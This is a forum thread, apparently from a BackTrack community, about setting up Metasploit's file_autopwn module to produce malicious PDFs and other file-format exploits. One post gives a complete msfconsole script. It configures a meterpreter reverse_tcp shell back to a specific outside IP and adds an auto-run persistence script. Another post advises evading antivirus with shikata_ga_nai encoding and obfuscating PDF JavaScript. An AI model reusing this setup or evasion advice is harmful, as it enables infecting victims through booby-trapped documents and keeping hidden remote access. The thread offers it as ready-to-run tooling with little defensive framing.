Results 1 to 6 of 6

Thread: Metasploit auxilary file_autopwn module - Video Tutorial

  1. #1

    Default Metasploit auxilary file_autopwn module - Video Tutorial

    hi,

    the relatively new msf 3 module auxiliary/server/file_autopwn is a very nice little feature to test all known file format client-side attacks.

    Using this script will provide you a web page with the relevant msf3 files, where you can perform all your client-side tests for known vulnerabilities.

    A quick video how to set it up can be found here...
    http://zerohat.de/_shared_files/vide..._file_autopwn/

    /brtw2003

  2. #2
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default Re: Metasploit auxilary file_autopwn module - Video Tutorial

    [[solved]] the PDF I was using to inject was causing the error. and also the LPORT_WIN32 is default to 3333 (the rev shell listen port ) not sure how to pass the "OnlyFiles" actions but whatever..
    NICe !

    I got no luck with
    windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
    I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:

    ( tried to replace localhost with my IP to a different host no luck )

    http://rmccurdy.com/scripts/msf_shells/out.txt

    I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works so maybe I am missing something it looks as tho it is creating the files fine but I get a DOS box popup with the file_autopwn and nothing in wireshark ?

    Code:
    rm -Rf /tmp/1 
    mkdir /tmp/1 
    rm -Rf ~/.msf3
    
    wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
    
    ./msfconsole
    
    db_driver sqlite3
    db_create pentest11
    setg LHOST 75.139.158.51
    setg LPORT 21
    setg SRVPORT 21
    setg LPORT_WIN32 21
    
    setg INFILENAME /tmp/file3.pdf
    
    
    use auxiliary/server/file_autopwn
    
    set OUTPATH /tmp/1
    
    set URIPATH /msf
    set SSL true
    set ExitOnSession false
    set PAYLOAD windows/meterpreter/reverse_tcp
    setg PAYLOAD windows/meterpreter/reverse_tcp
    set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
    run
    Last edited by opreat0r; 03-03-2010 at 08:06 PM.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    16

    Default Re: Metasploit auxilary file_autopwn module - Video Tutorial

    Great content. Will have to try it out.

    However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.

  4. #4

    Default

    Quote Originally Posted by jaykay232 View Post
    Great content. Will have to try it out.

    However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.
    well, I'm not a big friend of sophisticated videos, nor explaining a step-by-step-i-m-super-l33t-hack$ng-guide; this info should be enough to start with and dive more into the amazing msf3 development...i know I zoomed too many times, but that's why there is a pause button...

    /brtw2003

    Quote Originally Posted by opreat0r View Post
    NICe !

    I got no luck with
    windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
    I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:

    ( tried to replace localhost with my IP to a different host no luck )

    http://rmccurdy.com/scripts/msf_shells/out.txt

    I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works so maybe I am missing something it looks as tho it is creating the files fine but I get a DOS box popup with the file_autopwn and nothing in wireshark ?
    -does you your /tmp/file.pdf exists (you must use a real pdf document)?
    be aware, currently there are also no obfuscation mechanism added, therefore payloads are easily detected by an up-to-date AV (run a simple for loop for all exe files and run msfencode with shikata-ga-nai)

    PDF obfuscation, have a look around Didier Stevens blog or compress JS inside, like http://www.jslab.dk/tools.minify.php

    for more advanced options, start msf3, load file_autopwn and execute 'show advanced'

    /brtw2003
    Last edited by brtw2003; 03-02-2010 at 04:00 PM.

  5. #5
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Cool Re: Metasploit auxilary file_autopwn module - Video Tutorial

    It was the PDF ! I used the one in your example and it works ( at least with pdf exe)

  6. #6
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    23

    Default Re: Metasploit auxilary file_autopwn module - Video Tutorial

    Nice video / tutorial, Went ahead and gave this a whirl, used just about the same syntax as you, just different locations and such, scripted it out, after running my script I get errors stating
    Code:
    Exploit failed: SQLite3::SQLException: library routine called out of sequence: SELECT * FROM "workspaces" WHERE ("workspaces"."name" = 'default' ) LIMIT 1
    This continues on as it loops through all my file format exploits, when it gets to the end it comes back saying done, found 2 exploit modules, and launches the attack, starts up the folder where I can find vulnerabilities.

    I was reading around and it appears this happens if there are too many connections to the database going on at once. I followed your instructions on how to fix an error within metasploit in regards to pools, doing that did not resolve this problem.

    Any help is apprecaited.

Similar Threads

  1. Exploit-db quick navigation tutorial
    By Lincoln in forum BackTrack Howtos
    Replies: 2
    Last Post: 03-17-2011, 01:46 PM
  2. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  3. rogue AP + MITM (tutorial or script request)
    By Lucifer in forum Beginners Forum
    Replies: 8
    Last Post: 04-12-2010, 12:40 AM
  4. VMWare Workstation 6.5.2 Kernel 2.6.30 Module Fix
    By bruk0ut in forum BackTrack Fixes
    Replies: 0
    Last Post: 02-10-2010, 02:51 AM
  5. Replies: 1
    Last Post: 01-21-2010, 07:46 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •